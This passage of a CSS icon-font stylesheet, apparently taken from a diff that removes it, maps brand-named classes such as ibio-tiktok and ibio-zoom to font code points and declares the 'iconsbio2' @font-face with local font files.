-.ibio-streetvoice:before { content: "\f7cd"; } -.ibio-strike:before { content: "\f7ce"; } -.ibio-stripe:before { content: "\f7cf"; } -.ibio-stripe-cc:before { content: "\f7d0"; } -.ibio-strivectin:before { content: "\f7d1"; } -.ibio-stuart-weitzman:before { content: "\f7d2"; } -.ibio-styleseat:before { content: "\f7d3"; } -.ibio-subscribestar:before { content: "\f7d4"; } -.ibio-substack:before { content: "\f7d5"; } -.ibio-sudomemo:before { content: "\f7d6"; } -.ibio-sulwhasoo:before { content: "\f7d7"; } -.ibio-summer-fridays:before { content: "\f7d8"; } -.ibio-sunday-ii-sunday:before { content: "\f7d9"; } -.ibio-sunday-riley:before { content: "\f7da"; } -.ibio-supergoop:before { content: "\f7db"; } -.ibio-superlive:before { content: "\f7dc"; } -.ibio-superpeer:before { content: "\f7dd"; } -.ibio-superrare:before { content: "\f7de"; } -.ibio-supple:before { content: "\f7df"; } -.ibio-surratt-beauty:before { content: "\f7e0"; } -.ibio-suse:before { content: "\f7e1"; } -.ibio-susteau:before { content: "\f7e2"; } -.ibio-svbtle:before { content: "\f7e3"; } -.ibio-swarovski:before { content: "\f7e4"; } -.ibio-swatch:before { content: "\f7e5"; } -.ibio-swift:before { content: "\f7e6"; } -.ibio-swiggy:before { content: "\f7e7"; } -.ibio-swimply:before { content: "\f7e8"; } -.ibio-symfony:before { content: "\f7e9"; } -.ibio-t3-micro:before { content: "\f7ea"; } -.ibio-tableau:before { content: "\f7eb"; } -.ibio-tag-heuer:before { content: "\f7ec"; } -.ibio-tamtam:before { content: "\f7ed"; } -.ibio-tan-luxe:before { content: "\f7ee"; } -.ibio-tandem:before { content: "\f7ef"; } -.ibio-tapas:before { content: "\f7f0"; } -.ibio-tarte:before { content: "\f7f1"; } -.ibio-taste-beauty:before { content: "\f7f2"; } -.ibio-tatcha:before { content: "\f7f3"; } -.ibio-teachable:before { content: "\f7f4"; } -.ibio-teamspeak:before { content: "\f7f5"; } -.ibio-ted-baker:before { content: "\f7f6"; } -.ibio-teepublic:before { content: "\f7f7"; } -.ibio-teespring:before { content: "\f7f8"; } -.ibio-telegram:before { content: "\f7f9"; } -.ibio-teleportla:before { content: "\f7fa"; } -.ibio-tellonym:before { content: "\f7fb"; } -.ibio-tempestweather:before { content: "\f7fc"; } -.ibio-tetrio:before { content: "\f7fd"; } -.ibio-thangs:before { content: "\f7fe"; } -.ibio-the-7-virtues:before { content: "\f7ff"; } -.ibio-the-beauty-chef:before { content: "\f800"; } -.ibio-the-inkey-list:before { content: "\f801"; } -.ibio-the-north-face:before { content: "\f802"; } -.ibio-the-nue-co:before { content: "\f803"; } -.ibio-the-ordinary:before { content: "\f804"; } -.ibio-the-original-makeup-eraser:before { content: "\f805"; } -.ibio-the-phluid-project:before { content: "\f806"; } -.ibio-the-sims:before { content: "\f807"; } -.ibio-theknot:before { content: "\f808"; } -.ibio-themeco:before { content: "\f809"; } -.ibio-thevenuereport:before { content: "\f80a"; } -.ibio-thingiverse:before { content: "\f80b"; } -.ibio-thinkpeaks:before { content: "\f80c"; } -.ibio-thinkspot:before { content: "\f80d"; } -.ibio-threema:before { content: "\f80e"; } -.ibio-throne:before { content: "\f80f"; } -.ibio-thumbtack:before { content: "\f810"; } -.ibio-tidal:before { content: "\f811"; } -.ibio-tiffany-and-co:before { content: "\f812"; } -.ibio-tiktok:before { content: "\f813"; } -.ibio-tinder:before { content: "\f814"; } -.ibio-tinyletter:before { content: "\f815"; } -.ibio-tippinme:before { content: "\f816"; } -.ibio-tissot:before { content: "\f817"; } -.ibio-tj-maxx:before { content: "\f818"; } -.ibio-toast-tab:before { content: "\f819"; } -.ibio-tocca:before { content: "\f81a"; } -.ibio-tods:before { content: "\f81b"; } -.ibio-tokopedia:before { content: "\f81c"; } -.ibio-tom-ford:before { content: "\f81d"; } -.ibio-tommy-hilfiger:before { content: "\f81e"; } -.ibio-too-faced:before { content: "\f81f"; } -.ibio-topicals:before { content: "\f820"; } -.ibio-topshop:before { content: "\f821"; } -.ibio-toptal:before { content: "\f822"; } -.ibio-totallifechanges:before { content: "\f823"; } -.ibio-touch-in-sol:before { content: "\f824"; } -.ibio-touchland:before { content: "\f825"; } -.ibio-tower-28-beauty:before { content: "\f826"; } -.ibio-toyhouse:before { content: "\f827"; } -.ibio-tpt:before { content: "\f828"; } -.ibio-tracklib:before { content: "\f829"; } -.ibio-trading-view:before { content: "\f82a"; } -.ibio-trailforks:before { content: "\f82b"; } -.ibio-trakt:before { content: "\f82c"; } -.ibio-trakteer:before { content: "\f82d"; } -.ibio-traktrain:before { content: "\f82e"; } -.ibio-transifex:before { content: "\f82f"; } -.ibio-transistorfm:before { content: "\f830"; } -.ibio-traxsource:before { content: "\f831"; } -.ibio-treasureland:before { content: "\f832"; } -.ibio-trello:before { content: "\f833"; } -.ibio-triller:before { content: "\f834"; } -.ibio-tripadvisor:before { content: "\f835"; } -.ibio-trovo:before { content: "\f836"; } -.ibio-truckersmp:before { content: "\f837"; } -.ibio-trulia:before { content: "\f838"; } -.ibio-trust-pilot:before { content: "\f839"; } -.ibio-tula-skincare:before { content: "\f83a"; } -.ibio-tumblr:before { content: "\f83b"; } -.ibio-tunefind:before { content: "\f83c"; } -.ibio-tunein:before { content: "\f83d"; } -.ibio-tvmaze:before { content: "\f83e"; } -.ibio-tvtime:before { content: "\f83f"; } -.ibio-tweezerman:before { content: "\f840"; } -.ibio-twine:before { content: "\f841"; } -.ibio-twitch:before { content: "\f842"; } -.ibio-twitter:before { content: "\f843"; } -.ibio-typeshare:before { content: "\f844"; } -.ibio-typo3:before { content: "\f845"; } -.ibio-uber:before { content: "\f846"; } -.ibio-uber-eats:before { content: "\f847"; } -.ibio-ubisoft:before { content: "\f848"; } -.ibio-ubuntu:before { content: "\f849"; } -.ibio-udemy:before { content: "\f84a"; } -.ibio-uikit:before { content: "\f84b"; } -.ibio-umbraco:before { content: "\f84c"; } -.ibio-unchartedsoftware:before { content: "\f84d"; } -.ibio-under-armour:before { content: "\f84e"; } -.ibio-uniqlo:before { content: "\f84f"; } -.ibio-uniregistry:before { content: "\f850"; } -.ibio-unitedmasters:before { content: "\f851"; } -.ibio-unity3d:before { content: "\f852"; } -.ibio-unsplash:before { content: "\f853"; } -.ibio-unstoppable-domains:before { content: "\f854"; } -.ibio-untappd:before { content: "\f855"; } -.ibio-uplive:before { content: "\f856"; } -.ibio-ups:before { content: "\f857"; } -.ibio-upstream:before { content: "\f858"; } -.ibio-upwork:before { content: "\f859"; } -.ibio-urban-decay:before { content: "\f85a"; } -.ibio-urban-outfitters:before { content: "\f85b"; } -.ibio-uriji:before { content: "\f85c"; } -.ibio-usb:before { content: "\f85d"; } -.ibio-usdc:before { content: "\f85e"; } -.ibio-usps:before { content: "\f85f"; } -.ibio-utip:before { content: "\f860"; } -.ibio-vaadin:before { content: "\f861"; } -.ibio-vacheron-constantin:before { content: "\f862"; } -.ibio-valentino:before { content: "\f863"; } -.ibio-vcita:before { content: "\f864"; } -.ibio-velour-lashes:before { content: "\f865"; } -.ibio-venmo:before { content: "\f866"; } -.ibio-vera-wang:before { content: "\f867"; } -.ibio-verb:before { content: "\f868"; } -.ibio-vero:before { content: "\f869"; } -.ibio-versace:before { content: "\f86a"; } -.ibio-vevo:before { content: "\f86b"; } -.ibio-viacoin:before { content: "\f86c"; } -.ibio-viadeo:before { content: "\f86d"; } -.ibio-viator:before { content: "\f86e"; } -.ibio-vibe:before { content: "\f86f"; } -.ibio-viber:before { content: "\f870"; } -.ibio-victorias-secret:before { content: "\f871"; } -.ibio-viewbug:before { content: "\f872"; } -.ibio-viktor-rolf:before { content: "\f873"; } -.ibio-vimeo:before { content: "\f874"; } -.ibio-vimm:before { content: "\f875"; } -.ibio-vinted:before { content: "\f876"; } -.ibio-violet-voss:before { content: "\f877"; } -.ibio-virtue:before { content: "\f878"; } -.ibio-visa:before { content: "\f879"; } -.ibio-visa-cc:before { content: "\f87a"; } -.ibio-viseart:before { content: "\f87b"; } -.ibio-vital-proteins:before { content: "\f87c"; } -.ibio-vitruvi:before { content: "\f87d"; } -.ibio-vk:before { content: "\f87e"; } -.ibio-vlive:before { content: "\f87f"; } -.ibio-vocalmedia:before { content: "\f880"; } -.ibio-volition-beauty:before { content: "\f881"; } -.ibio-volume:before { content: "\f882"; } -.ibio-voluspa:before { content: "\f883"; } -.ibio-vrchat:before { content: "\f884"; } -.ibio-vsco:before { content: "\f885"; } -.ibio-vskit:before { content: "\f886"; } -.ibio-vuejs:before { content: "\f887"; } -.ibio-wakelet:before { content: "\f888"; } -.ibio-wall-of-text:before { content: "\f889"; } -.ibio-wander-beauty:before { content: "\f88a"; } -.ibio-watchmanmonitor:before { content: "\f88b"; } -.ibio-wattpad:before { content: "\f88c"; } -.ibio-waveful:before { content: "\f88d"; } -.ibio-wavyfm:before { content: "\f88e"; } -.ibio-waze:before { content: "\f88f"; } -.ibio-wazirx:before { content: "\f890"; } -.ibio-we-heart-it:before { content: "\f891"; } -.ibio-weatherunderground:before { content: "\f892"; } -.ibio-webex:before { content: "\f893"; } -.ibio-webtalk:before { content: "\f894"; } -.ibio-webtoon:before { content: "\f895"; } -.ibio-wechat:before { content: "\f896"; } -.ibio-weddingwire:before { content: "\f897"; } -.ibio-weebly:before { content: "\f898"; } -.ibio-weibo:before { content: "\f899"; } -.ibio-wescover:before { content: "\f89a"; } -.ibio-westman-atelier:before { content: "\f89b"; } -.ibio-wetransfer:before { content: "\f89c"; } -.ibio-whatnot:before { content: "\f89d"; } -.ibio-whatsapp:before { content: "\f89e"; } -.ibio-whcms:before { content: "\f89f"; } -.ibio-wikipedia:before { content: "\f8a0"; } -.ibio-wimatch:before { content: "\f8a1"; } -.ibio-windows:before { content: "\f8a2"; } -.ibio-wirsindhandwerk:before { content: "\f8a3"; } -.ibio-wishful:before { content: "\f8a4"; } -.ibio-wix:before { content: "\f8a5"; } -.ibio-wizardsofthecoast:before { content: "\f8a6"; } -.ibio-wordpress:before { content: "\f8a7"; } -.ibio-world-anvil:before { content: "\f8a8"; } -.ibio-world-of-warcraft:before { content: "\f8a9"; } -.ibio-wpbeginner:before { content: "\f8aa"; } -.ibio-wpexplorer:before { content: "\f8ab"; } -.ibio-wpforms:before { content: "\f8ac"; } -.ibio-wpressr:before { content: "\f8ad"; } -.ibio-writeas:before { content: "\f8ae"; } -.ibio-writefreely:before { content: "\f8af"; } -.ibio-xbox:before { content: "\f8b0"; } -.ibio-xiaohongshu:before { content: "\f8b1"; } -.ibio-xing:before { content: "\f8b2"; } -.ibio-yahoo:before { content: "\f8b3"; } -.ibio-yammer:before { content: "\f8b4"; } -.ibio-yandex:before { content: "\f8b5"; } -.ibio-yandexmusic:before { content: "\f8b6"; } -.ibio-yarn:before { content: "\f8b7"; } -.ibio-ycombinator:before { content: "\f8b8"; } -.ibio-yelp:before { content: "\f8b9"; } -.ibio-yoast:before { content: "\f8ba"; } -.ibio-younow:before { content: "\f8bb"; } -.ibio-youpic:before { content: "\f8bc"; } -.ibio-youth-to-the-people:before { content: "\f8bd"; } -.ibio-youtube:before { content: "\f8be"; } -.ibio-youtubemusic:before { content: "\f8bf"; } -.ibio-yubo:before { content: "\f8c0"; } -.ibio-yves-saint-laurent:before { content: "\f8c1"; } -.ibio-zalando:before { content: "\f8c2"; } -.ibio-zalo:before { content: "\f8c3"; } -.ibio-zapier:before { content: "\f8c4"; } -.ibio-zara:before { content: "\f8c5"; } -.ibio-zazzle:before { content: "\f8c6"; } -.ibio-zeemee:before { content: "\f8c7"; } -.ibio-zelle:before { content: "\f8c8"; } -.ibio-zello:before { content: "\f8c9"; } -.ibio-zenly:before { content: "\f8ca"; } -.ibio-zhihu:before { content: "\f8cb"; } -.ibio-zillow:before { content: "\f8cc"; } -.ibio-zoho-books:before { content: "\f8cd"; } -.ibio-zomato:before { content: "\f8ce"; } -.ibio-zora:before { content: "\f8cf"; } -/* - Icon Font: iconsbio2 -*/ - -@font-face { - font-family: "iconsbio2"; - src: url("../fonts/iconsbio2_c50814b9b24c1e58d9e3e9a245a8c9e5.eot"); - src: url("../fonts/iconsbio2_c50814b9b24c1e58d9e3e9a245a8c9e5.eot#iefix") format("embedded-opentype"), - url("../fonts/iconsbio2_c50814b9b24c1e58d9e3e9a245a8c9e5.woff2") format("woff2"), - url("../fonts/iconsbio2_c50814b9b24c1e58d9e3e9a245a8c9e5.woff") format("woff"), - url("../fonts/iconsbio2_c50814b9b24c1e58d9e3e9a245a8c9e5.ttf") format("truetype"), - url("../images/iconsbio2_c50814b9b24c1e58d9e3e9a245a8c9e5.svg#iconsbio2") format("svg"); - font-weight: normal; - font-style: normal; -} - -@media screen and (-webkit-min-device-pixel-ratio:0) { - @font-face { - font-family: "iconsbio2"; - src: url("../images/iconsbio2_c50814b9b24c1e58d9e3e9a245a8c9e5.svg#iconsbio2") format("svg"); - } -} - -[data-icon]:before { content: attr(data-icon); } - -[data-icon]:before, -.ibio-3cketcom:before, -.ibio-99designs:before, -.ibio-accupass:before, -.ibio-activecampaign:before, -.ibio-activision:before, -.ibio-advisorycloud:before, -.ibio-airchat:before, -.ibio-alleventsin:before, -.ibio-alltrails:before, -.ibio-aluacom:before, -.ibio-amazingradio:before, -.ibio-amazonwishlist:before, -.ibio-anobii:before, -.ibio-apple-books:before, -.ibio-arbonne:before, -.ibio-arena:before, -.ibio-arrivala:before, -.ibio-artistree:before, -.ibio-artpal:before, -.ibio-audiocom:before, -.ibio-audiotool:before, -.ibio-aweber:before, -.ibio-backloggd:before, -.ibio-beatport:before, -.ibio-beehiiv:before, -.ibio-belletristica:before, -.ibio-bitview:before, -.ibio-bluesky:before, -.ibio-blueskyold:before, -.ibio-bollyx:before, -.ibio-boltplustv:before, -.ibio-bonfire:before, -.ibio-book:before, -.ibio-book-of-the-month:before, -.ibio-bookdinners:before, -.ibio-booknode:before, -.ibio-booksirens:before, -.ibio-bookwyrm:before, -.ibio-bookyogaretreat:before, -.ibio-boostyto:before, -.ibio-boothpm:before, -.ibio-brevo:before, -.ibio-btclighting:before, -.ibio-byfans:before, -.ibio-cafecito:before, -.ibio-calaxy:before, -.ibio-campaignmonitor:before, -.ibio-capcut:before, -.ibio-caraapp:before, -.ibio-channelio:before, -.ibio-cifra:before, -.ibio-circlmobility:before, -.ibio-clickasnap:before, -.ibio-cohostorg:before, -.ibio-commonninja:before, -.ibio-concertarchives:before, -.ibio-contracom:before, -.ibio-convertkit:before, -.ibio-crexi:before, -.ibio-crowdin:before, -.ibio-cryptocom:before, -.ibio-curated:before, -.ibio-cyberimpact:before, -.ibio-dailyhunt:before, -.ibio-deliveroo:before, -.ibio-dhgate:before, -.ibio-diamondapp:before, -.ibio-digistore24:before, -.ibio-dnldnft:before, -.ibio-dogecoin:before, -.ibio-domestika:before, -.ibio-doneru:before, -.ibio-doordash:before, -.ibio-drip:before, -.ibio-easports:before, -.ibio-ecomail:before, -.ibio-edmtrain:before, -.ibio-effectivealtruism:before, -.ibio-elfsight:before, -.ibio-emailoctopus:before, -.ibio-enjoeibr:before, -.ibio-envato:before, -.ibio-etoro:before, -.ibio-eventix:before, -.ibio-ezbio:before, -.ibio-f6s:before, -.ibio-fablebookclub:before, -.ibio-fambase:before, -.ibio-fanpage:before, -.ibio-fantia:before, -.ibio-farcasterxyz:before, -.ibio-fineartamerica:before, -.ibio-five-rise-records:before, -.ibio-flipsnack:before, -.ibio-flo:before, -.ibio-fluentcrm:before, -.ibio-fortnite:before, -.ibio-freshcut:before, -.ibio-friendtok:before, -.ibio-funanl:before, -.ibio-gamerprofiles:before, -.ibio-geneva:before, -.ibio-getyourguide:before, -.ibio-ghostorg-alt:before, -.ibio-ghostorg-circle:before, -.ibio-gifty:before, -.ibio-givecampus:before, -.ibio-gmail:before, -.ibio-google-calendar:before, -.ibio-googleads:before, -.ibio-googleanalytics:before, -.ibio-googlemeet:before, -.ibio-grainery:before, -.ibio-hearnow:before, -.ibio-herbalife:before, -.ibio-heroheroco:before, -.ibio-hevy:before, -.ibio-hipstamatic:before, -.ibio-hivesocial:before, -.ibio-humanitix:before, -.ibio-idus:before, -.ibio-ifood:before, -.ibio-ifttt:before, -.ibio-igsched:before, -.ibio-igstory:before, -.ibio-igsync:before, -.ibio-inkedgaming:before, -.ibio-inkitt:before, -.ibio-instagramchannel:before, -.ibio-integrately:before, -.ibio-invitationcodes:before, -.ibio-irc:before, -.ibio-ircprotocol:before, -.ibio-jimdo:before, -.ibio-joinentre:before, -.ibio-jooxmusic:before, -.ibio-kickstreaming:before, -.ibio-kindle:before, -.ibio-kivaorg:before, -.ibio-kkbb:before, -.ibio-klaviyo:before, -.ibio-klicktipp:before, -.ibio-klook:before, -.ibio-knowt:before, -.ibio-konectgg:before, -.ibio-kworkcom:before, -.ibio-langit-musik:before, -.ibio-lapse:before, -.ibio-lattescnpq:before, -.ibio-learnworlds:before, -.ibio-leboncoin:before, -.ibio-leetcode:before, -.ibio-lemon8:before, -.ibio-lemonsqueezy:before, -.ibio-lensxyz:before, -.ibio-leonardoai:before, -.ibio-liberapay:before, -.ibio-linedashed:before, -.ibio-linesolid:before, -.ibio-linesolidthicker:before, -.ibio-linesolidthickest:before, -.ibio-linkme:before, -.ibio-livechat:before, -.ibio-lnkbio:before, -.ibio-lnkbio-circle:before, -.ibio-lnkbio-square:before, -.ibio-localscom:before, -.ibio-loop-store:before, -.ibio-loopnet:before, -.ibio-loopsso:before, -.ibio-magicedenio:before, -.ibio-mailerlite:before, -.ibio-mailjet:before, -.ibio-make:before, -.ibio-mercadopago:before, -.ibio-michaelscom:before, -.ibio-midjourney:before, -.ibio-mieuxenseigner:before, -.ibio-minecraftwiki:before, -.ibio-miningpoolstats:before, -.ibio-miodottore-it:before, -.ibio-mipicco:before, -.ibio-mixxedfit:before, -.ibio-moosend:before, -.ibio-mspowerautomate:before, -.ibio-mybrightwheel:before, -.ibio-myfansse:before, -.ibio-mywishlistonline:before, -.ibio-namemc:before, -.ibio-naverblog:before, -.ibio-naversmartstore:before, -.ibio-ncsmusic:before, -.ibio-neobook:before, -.ibio-neopets:before, -.ibio-new-west-records:before, -.ibio-nexon:before, -.ibio-nftify:before, -.ibio-ngl:before, -.ibio-nostr:before, -.ibio-notecom:before, -.ibio-omnisend:before, -.ibio-opentable:before, -.ibio-orintful:before, -.ibio-outlook:before, -.ibio-pabbly:before, -.ibio-pangobooks:before, -.ibio-paperpie:before, -.ibio-paypay:before, -.ibio-paysafecard:before, -.ibio-pebbleis:before, -.ibio-peertube:before, -.ibio-penup:before, -.ibio-perrk:before, -.ibio-piccadilly-records:before, -.ibio-pie-vinyl:before, -.ibio-pintplease:before, -.ibio-pipedream:before, -.ibio-plaid-room-records:before, -.ibio-plastichead:before, -.ibio-platekompaniet:before, -.ibio-platenzaak:before, -.ibio-platinum-agency:before, -.ibio-platomania:before, -.ibio-plausible:before, -.ibio-play-srf:before, -.ibio-playpack-records:before, -.ibio-plusmusicpl:before, -.ibio-pnkslm:before, -.ibio-podcastics:before, -.ibio-podcastsbykajabi:before, -.ibio-podigee:before, -.ibio-podimo:before, -.ibio-podlink:before, -.ibio-poison-city-records:before, -.ibio-ponto-frio:before, -.ibio-pony-canyon:before, -.ibio-pop-market:before, -.ibio-pop-wig-records:before, -.ibio-popde:before, -.ibio-poponautde:before, -.ibio-poptube:before, -.ibio-popular-online:before, -.ibio-port-merch:before, -.ibio-postnews:before, -.ibio-praisecharts:before, -.ibio-prefect-records:before, -.ibio-pressreader:before, -.ibio-presto-music:before, -.ibio-print-gakufu:before, -.ibio-printablescom:before, -.ibio-printify:before, -.ibio-proper-music:before, -.ibio-properstar:before, -.ibio-protonmail:before, -.ibio-psychologytoday:before, -.ibio-pultru:before, -.ibio-pure-indie-records:before, -.ibio-pure-noise-records:before, -.ibio-qbd-books:before, -.ibio-qello:before, -.ibio-qikplay:before, -.ibio-qrates:before, -.ibio-qub-musique:before, -.ibio-rabid-records:before, -.ibio-racket-records:before, -.ibio-radio-bob:before, -.ibio-radio-eins:before, -.ibio-radio-freccia:before, -.ibio-rainbow-blonde:before, -.ibio-raketph:before, -.ibio-rakuten:before, -.ibio-rcast:before, -.ibio-rdstation:before, -.ibio-readings-australia:before, -.ibio-real-groovy:before, -.ibio-realityapp:before, -.ibio-reaper-entertainment:before, -.ibio-rebel-records:before, -.ibio-recochoku:before, -.ibio-record-collector:before, -.ibio-record-pusher:before, -.ibio-record-records:before, -.ibio-record-shop-merurido:before, -.ibio-records-with-merritt:before, -.ibio-recroom:before, -.ibio-red-bull-records-store:before, -.ibio-red-eye-records:before, -.ibio-reetail:before, -.ibio-renaissanceapp:before, -.ibio-rhein-konzerte:before, -.ibio-rhythm-merch:before, -.ibio-rillbar:before, -.ibio-rinse-fm:before, -.ibio-riotgames:before, -.ibio-ripple:before, -.ibio-rise-records:before, -.ibio-roadrunner-records-store:before, -.ibio-rock-action-records:before, -.ibio-rock-serwis:before, -.ibio-rock-sound:before, -.ibio-rock-this-town-records:before, -.ibio-rockabilia:before, -.ibio-rockmall:before, -.ibio-rockmark:before, -.ibio-rocktud:before, -.ibio-roku:before, -.ibio-rottentomatoes:before, -.ibio-rubadub:before, -.ibio-sainsburys:before, -.ibio-salzers-records:before, -.ibio-samsung:before, -.ibio-sanborns:before, -.ibio-sandmilk:before, -.ibio-sarbacane:before, -.ibio-schnitzel-records:before, -.ibio-scopus:before, -.ibio-scratchmitedu:before, -.ibio-scribehow:before, -.ibio-scriv:before, -.ibio-sdban:before, -.ibio-secret-city-records:before, -.ibio-secret-sounds:before, -.ibio-secretly-store:before, -.ibio-sendernet:before, -.ibio-sendfox:before, -.ibio-sendinblue:before, -.ibio-sendpulse:before, -.ibio-sendx:before, -.ibio-senja:before, -.ibio-serializd:before, -.ibio-serious-beats:before, -.ibio-setlistfm:before, -.ibio-setmore:before, -.ibio-sharptone:before, -.ibio-shecodesio:before, -.ibio-sheet-music-plus:before, -.ibio-shibainucoin:before, -.ibio-shogun-audio:before, -.ibio-shop-pbs:before, -.ibio-shop24direct:before, -.ibio-shoplookio:before, -.ibio-shopmy:before, -.ibio-shoppercom:before, -.ibio-shoppingat:before, -.ibio-shoppymn:before, -.ibio-shutterstock:before, -.ibio-sideonedummy-records:before, -.ibio-signum-records:before, -.ibio-signup:before, -.ibio-silva-screen-records:before, -.ibio-silversneakers:before, -.ibio-simfy-africa:before, -.ibio-singtel:before, -.ibio-sirius-xm:before, -.ibio-skiddle:before, -.ibio-skillr:before, -.ibio-skillshare:before, -.ibio-skip-the-dishes:before, -.ibio-sklepzmuzykapl:before, -.ibio-skoobe:before, -.ibio-skool:before, -.ibio-sky-go:before, -.ibio-sky-tv:before, -.ibio-slick:before, -.ibio-slide-record-shop:before, -.ibio-sm-entertainment:before, -.ibio-smart-punk-records:before, -.ibio-smart-usen:before, -.ibio-smubu:before, -.ibio-smule:before, -.ibio-snackvideo:before, -.ibio-snortsocial:before, -.ibio-soar-music-group:before, -.ibio-solid-state-records:before, -.ibio-som-livre:before, -.ibio-soma-records:before, -.ibio-songtradr:before, -.ibio-sonic-bookings:before, -.ibio-sony-music:before, -.ibio-sottotesi:before, -.ibio-soundee:before, -.ibio-space-shower-music:before, -.ibio-sparechange:before, -.ibio-specialist-subjects-records:before, -.ibio-speedstar-records:before, -.ibio-spillcom:before, -.ibio-spindizzy-records:before, -.ibio-spinefarm-records:before, -.ibio-spinlet:before, -.ibio-spinnin-records:before, -.ibio-spinspin:before, -.ibio-spiritfanfics:before, -.ibio-spkr-media:before, -.ibio-spoutible:before, -.ibio-squadratscom:before, -.ibio-srf:before, -.ibio-stage-entertainment:before, -.ibio-standaard-boekhadel:before, -.ibio-starhub:before, -.ibio-starz:before, -.ibio-statsfm:before, -.ibio-stimulus-com:before, -.ibio-stones-throw-records:before, -.ibio-streamelements:before, -.ibio-strongnation:before, -.ibio-sub-pop-mega-mart:before, -.ibio-subk-shop:before, -.ibio-sublime-merch-store:before, -.ibio-subtv-playlister:before, -.ibio-sun-records:before, -.ibio-sunrise-records:before, -.ibio-superpuma-records:before, -.ibio-supraphon:before, -.ibio-supraphonline-cd:before, -.ibio-supreme-chaos-records:before, -.ibio-svt-play:before, -.ibio-swamp-records:before, -.ibio-sweden-rock-magazine:before, -.ibio-symplicitycom:before, -.ibio-system-records:before, -.ibio-systemeio:before, -.ibio-t2:before, -.ibio-taaze:before, -.ibio-taiwanmobile:before, -.ibio-takealot:before, -.ibio-takt1:before, -.ibio-talkshoplive:before, -.ibio-tall-bird-records:before, -.ibio-tango-discos:before, -.ibio-tapete-records:before, -.ibio-target:before, -.ibio-tcgplayer:before, -.ibio-telasa:before, -.ibio-telecharge:before, -.ibio-telia:before, -.ibio-telstra:before, -.ibio-tematika:before, -.ibio-temu:before, -.ibio-terabox:before, -.ibio-termsandconditions:before, -.ibio-tesco:before, -.ibio-testimonialto:before, -.ibio-thaa-records:before, -.ibio-the-sound-of-vinyl:before, -.ibio-theatre-tickets-direct:before, -.ibio-thebase-in:before, -.ibio-themighty:before, -.ibio-threadless:before, -.ibio-threads:before, -.ibio-ticket:before, -.ibio-ticketbooth:before, -.ibio-ticketek:before, -.ibio-ticketline:before, -.ibio-ticketmaster:before, -.ibio-ticketone:before, -.ibio-ticketportalcz:before, -.ibio-ticketsmarche:before, -.ibio-ticketstreamcz:before, -.ibio-tickettailor:before, -.ibio-ticketweb:before, -.ibio-tidio:before, -.ibio-tidycal:before, -.ibio-timetree:before, -.ibio-tipmeinth:before, -.ibio-tistory:before, -.ibio-tkigv3:before, -.ibio-tksched:before, -.ibio-tksync:before, -.ibio-toolroom-records:before, -.ibio-tooth-nail-records:before, -.ibio-top-j-records:before, -.ibio-topshelf-records:before, -.ibio-touchapp:before, -.ibio-toutiao:before, -.ibio-trackdrip:before, -.ibio-trackitdown:before, -.ibio-trakteer:before, -.ibio-transfermarkt:before, -.ibio-transgressive-records:before, -.ibio-trax-magazine:before, -.ibio-tribel:before, -.ibio-tricatel:before, -.ibio-trontrx:before, -.ibio-tryhackme:before, -.ibio-tubi:before, -.ibio-tuneafrique:before, -.ibio-tunecore:before, -.ibio-tunespeak:before, -.ibio-turbo-recordings:before, -.ibio-turntable-city:before, -.ibio-turntablelab:before, -.ibio-twintpayment:before, -.ibio-twitterx:before, -.ibio-udiscover:before, -.ibio-udux:before, -.ibio-uiclap:before, -.ibio-ukf:before, -.ibio-ultra-shibuya:before, -.ibio-ulule:before, -.ibio-umg:before, -.ibio-ummalife:before, -.ibio-unbound:before, -.ibio-uncle-m:before, -.ibio-underdog-recordstore:before, -.ibio-underground-solushn:before, -.ibio-unearthed-sounds:before, -.ibio-unfd:before, -.ibio-unlokme:before, -.ibio-unser-ding:before, -.ibio-unvale:before, -.ibio-upc-tv:before, -.ibio-uppwind-records:before, -.ibio-uproxx:before, -.ibio-utapass:before, -.ibio-valley-entertainment:before, -.ibio-van-records:before, -.ibio-vbout:before, -.ibio-vbox7:before, -.ibio-veeps:before, -.ibio-veloviewer:before, -.ibio-velvet-music:before, -.ibio-venn-records:before, -.ibio-vernoshop:before, -.ibio-verve-forecast:before, -.ibio-verve-records:before, -.ibio-vialma:before, -.ibio-viaplay:before, -.ibio-videociety:before, -.ibio-videoload:before, -.ibio-village-live-records:before, -.ibio-village-sounds:before, -.ibio-vinilo-record-store:before, -.ibio-vintage-vinyl:before, -.ibio-vinylcomau:before, -.ibio-vodafone:before, -.ibio-voiceshop:before, -.ibio-void-vinyl:before, -.ibio-voyo:before, -.ibio-vp-reggae:before, -.ibio-vudu:before, -.ibio-vuulm:before, -.ibio-vvvid:before, -.ibio-wallapop:before, -.ibio-walletofsatoshi:before, -.ibio-walmart:before, -.ibio-ward-records:before, -.ibio-warner-music:before, -.ibio-waterloo-records:before, -.ibio-we-are-vinyl:before, -.ibio-webofscience:before, -.ibio-wechatchannels:before, -.ibio-wedonthavetime:before, -.ibio-weezevent:before, -.ibio-weltbild:before, -.ibio-wenod-records:before, -.ibio-werkdiscs:before, -.ibio-weserlabel:before, -.ibio-west-one-music:before, -.ibio-wetravel:before, -.ibio-weverse:before, -.ibio-wh-smith:before, -.ibio-what-records:before, -.ibio-whatsappchannel:before, -.ibio-whatsappgroup:before, -.ibio-wichita-recordings:before, -.ibio-wikiloc:before, -.ibio-wildthing-records-store:before, -.ibio-wink:before, -.ibio-winylownia:before, -.ibio-wise:before, -.ibio-wishtender:before, -.ibio-woodstock:before, -.ibio-world-circuit:before, -.ibio-world-of-music:before, -.ibio-world-star-hip-hop:before, -.ibio-worship-musician-magazine:before, -.ibio-worship-together:before, -.ibio-wowow:before, -.ibio-wwe:before, -.ibio-wynkmusic:before, -.ibio-xiaomi:before, -.ibio-xl-recordings:before, -.ibio-xmpp:before, -.ibio-xpfreelancer:before, -.ibio-xtra-mile-recordings:before, -.ibio-yacvoice:before, -.ibio-yamano-music:before, -.ibio-yep-roc-records:before, -.ibio-youradio:before, -.ibio-yousee-musik:before, -.ibio-zaiko:before, -.ibio-zavvi:before, -.ibio-zbooni:before, -.ibio-zenyandex:before, -.ibio-zerodha:before, -.ibio-zia-records:before, -.ibio-ziggo:before, -.ibio-zinio:before, -.ibio-zipmessage:before, -.ibio-zoho-campaigns:before, -.ibio-zohoforms:before, -.ibio-zoom:before, -.ibio-zumba:before, -.ibio-zvuk:before { - display: inline-block; - font-family: "iconsbio2"; - font-style: normal; - font-weight: normal; - font-variant: normal; - line-height: 1; - text-decoration: inherit; - text-rendering: optimizeLegibility; - text-transform: none; - -moz-osx-font-smoothing: grayscale; - -webkit-font-smoothing: antialiased; - font-smoothing: antialiased; -} - -.ibio-3cketcom:before { content: "\f308"; } -.ibio-99designs:before { content: "\f309"; } -.ibio-accupass:before { content: "\f100"; } 